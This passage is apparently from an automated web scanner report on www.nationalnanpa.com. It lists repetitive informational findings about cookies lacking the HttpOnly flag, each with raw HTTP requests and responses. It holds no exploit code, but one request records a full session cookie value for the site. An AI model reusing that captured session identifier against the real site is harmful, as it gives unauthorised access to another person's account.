User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:56 GMT
Server: Apache
Set-Cookie: vblastvisit=1305158636; expires=Fri, 11-May-2012 00:03:56 GMT; path=/
Set-Cookie: vblastactivity=0; expires=Fri, 11-May-2012 00:03:56 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Length: 1293
Content-Type: text/html; charset=ISO-8859-1


   function thread(threadid, title, poster, threaddate, threadtime)
   {
       this.threadid = threadid;
       this.title = title;
       this.poster = poster;
       this.threaddate = threaddate;
       this.threadtime = thre
...[SNIP]...

13.38. http://www.nationalnanpa.com/area_code_maps/usmaps/ak.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/ak.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ak.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:54 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:05 GMT
ETag: "2872e-29b4-471ab6b933b40"
Accept-Ranges: bytes
Content-Length: 10676
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

...[SNIP]...

13.39. http://www.nationalnanpa.com/area_code_maps/usmaps/al.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/al.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/al.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:54 GMT
Server: Apache
Last-Modified: Wed, 23 Jun 2010 18:17:36 GMT
ETag: "2873c-4a7d-489b68d637000"
Accept-Ranges: bytes
Content-Length: 19069
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

...[SNIP]...

13.40. http://www.nationalnanpa.com/area_code_maps/usmaps/ar.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/ar.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ar.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:54 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:05 GMT
ETag: "a81c1-2351-471ab6b933b40"
Accept-Ranges: bytes
Content-Length: 9041
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.41. http://www.nationalnanpa.com/area_code_maps/usmaps/az.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/az.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/az.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:54 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:06 GMT
ETag: "28743-20c2-471ab6ba27d80"
Accept-Ranges: bytes
Content-Length: 8386
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

...[SNIP]...

13.42. http://www.nationalnanpa.com/area_code_maps/usmaps/ca.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/ca.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ca.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:56 GMT
Server: Apache
Last-Modified: Fri, 13 Nov 2009 19:55:04 GMT
ETag: "a81de-adbd-47846092f9600"
Accept-Ranges: bytes
Content-Length: 44477
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.43. http://www.nationalnanpa.com/area_code_maps/usmaps/co.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/co.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/co.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:56 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "28727-208f-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 8335
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

...[SNIP]...

13.44. http://www.nationalnanpa.com/area_code_maps/usmaps/ct.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/ct.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ct.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:56 GMT
Server: Apache
Last-Modified: Mon, 07 Dec 2009 19:47:45 GMT
ETag: "a81c6-6275-47a28bb35fa40"
Accept-Ranges: bytes
Content-Length: 25205
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.45. http://www.nationalnanpa.com/area_code_maps/usmaps/dc.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/dc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/dc.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:57 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "2871a-182b-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 6187
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

...[SNIP]...

13.46. http://www.nationalnanpa.com/area_code_maps/usmaps/de.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/de.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/de.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:57 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "a81c5-3284-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 12932
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.47. http://www.nationalnanpa.com/area_code_maps/usmaps/fl.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/fl.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/fl.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:57 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "a81e9-345f-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 13407
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.48. http://www.nationalnanpa.com/area_code_maps/usmaps/ga.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/ga.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ga.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:57 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "a81d1-baf4-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 47860
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.49. http://www.nationalnanpa.com/area_code_maps/usmaps/hi.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/hi.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/hi.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:58 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "28728-20cb-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 8395
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

...[SNIP]...

13.50. http://www.nationalnanpa.com/area_code_maps/usmaps/ia.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/ia.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ia.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:58 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "a81f5-2624-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 9764
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.51. http://www.nationalnanpa.com/area_code_maps/usmaps/id.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/id.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/id.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:58 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "a81d6-1bb1-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 7089
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.52. http://www.nationalnanpa.com/area_code_maps/usmaps/il.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/il.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/il.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:58 GMT
Server: Apache
Last-Modified: Fri, 06 Nov 2009 19:09:21 GMT
ETag: "a81d5-7594-477b894cd1a40"
Accept-Ranges: bytes
Content-Length: 30100
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.53. http://www.nationalnanpa.com/area_code_maps/usmaps/in.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/in.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/in.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:59 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "a81f7-26ad-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 9901
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.54. http://www.nationalnanpa.com/area_code_maps/usmaps/ks.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/ks.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ks.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:59 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:08 GMT
ETag: "28732-1f54-471ab6bc10200"
Accept-Ranges: bytes
Content-Length: 8020
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

...[SNIP]...

13.55. http://www.nationalnanpa.com/area_code_maps/usmaps/ky.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/ky.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ky.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:59 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:08 GMT
ETag: "28736-200b-471ab6bc10200"
Accept-Ranges: bytes
Content-Length: 8203
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

...[SNIP]...

13.56. http://www.nationalnanpa.com/area_code_maps/usmaps/la.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/la.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/la.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:59 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:08 GMT
ETag: "a81f3-2aa4-471ab6bc10200"
Accept-Ranges: bytes
Content-Length: 10916
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.57. http://www.nationalnanpa.com/area_code_maps/usmaps/ma.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/ma.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ma.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:08:00 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:08 GMT
ETag: "a81e7-35a1-471ab6bc10200"
Accept-Ranges: bytes
Content-Length: 13729
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.58. http://www.nationalnanpa.com/area_code_maps/usmaps/us.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/us.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/us.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:17 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:19 GMT
ETag: "a81ea-a407-471ab6c68dac0"
Accept-Ranges: bytes
Content-Length: 41991
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.59. http://www.nationalnanpa.com/contact_us/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /contact_us/index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact_us/index.html HTTP/1.1
Host: www.nationalnanpa.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:17 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 410
Content-Type: text/html
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...

13.60. http://www.nationalnanpa.com/content/img/cm_areaMap.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/cm_areaMap.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/cm_areaMap.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:52 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 19:45:58 GMT
ETag: "a004b-64ed-486e397200980"
Accept-Ranges: bytes
Content-Length: 25837
Content-Type: image/jpeg
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.61. http://www.nationalnanpa.com/content/img/codeMap_bg.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/codeMap_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/codeMap_bg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:53 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:25 GMT
ETag: "a002a-6fa-471ab6cc46840"
Accept-Ranges: bytes
Content-Length: 1786
Content-Type: image/jpeg
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.62. http://www.nationalnanpa.com/content/img/fastTrack_bg.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/fastTrack_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

